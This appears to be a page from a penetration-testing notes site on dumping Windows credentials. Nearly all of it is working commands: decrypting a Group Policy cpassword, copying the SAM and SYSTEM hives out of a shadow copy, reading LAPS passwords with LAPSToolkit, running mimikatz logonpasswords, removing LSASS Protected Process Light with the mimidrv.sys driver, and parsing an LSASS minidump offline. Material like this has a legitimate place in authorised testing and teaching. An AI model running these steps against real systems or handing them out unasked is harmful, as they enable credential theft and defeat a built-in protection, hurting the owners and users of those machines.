Credential Dumping

cpassword

Groups.xml --- Less likely to run into this on a modern environment as they stopped doing this in 2012.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeX
cpassword

SAM Database Dump

wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
Shadow Copy of the C:\ Drive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\myhackingblog\sam              
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\myhackingblog\system
Moving sam and system off of the shadow volume
Downloading Sam and System onto Kali
Using creddump7 pwdump to decrypt the SAM Database to retrieve the Administrator NTLM Hash

Windows Local Administrator Password Solution (LAPS) 

Import-Module .\LAPSToolkit.ps1
Get-LAPSComputers
Find-LAPSDelegatedGroups
Get-NetGroupMember -GroupName "LAPS Password Readers"

## Gain access to a user in the LAPS Password Readers Group and procede to dump the password.
runas /noprofile /user:domain\user "powershell -exec bypass"
Import-Module .\LAPSToolkit.ps1
Get-LAPSComputer

LSA Hash Dump (NTLM or Plaintext) Using Mimikatz

mimikatz.exe  ## As an administrator
privilege::debug  ## Anything other than a 20 likely implies your being blocked or not admin.        
sekurlsa::logonpasswords

Local Security Authority Server Service (LSASS) can enable a Local Security Authority protection called Protected Process Light (PPL). When this is enabled not even a process running at system level integrity can dump logon passwords/hashes.

This attribute is set in the following registry and is enforced by a bit in the EPROCESS kernel object.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

Fortunately for us mimikatz already has a built in bypass for this. This is done by using it's mimidrv.sys driver and already having local Administrator or System level permissions. High/System level is needed in order to use the SeLoadDriverPrivilege required to load signed drivers.

mimikatz.exe
!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

It's also possible to retrieve the hash without utilizing mimikatz on the victim computer by dumping the lsass processes using the task manager and opening the dump file on a local attacker controlled windows computer.

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
PreviousSMBNextAccess Tokens

Last updated

Was this helpful?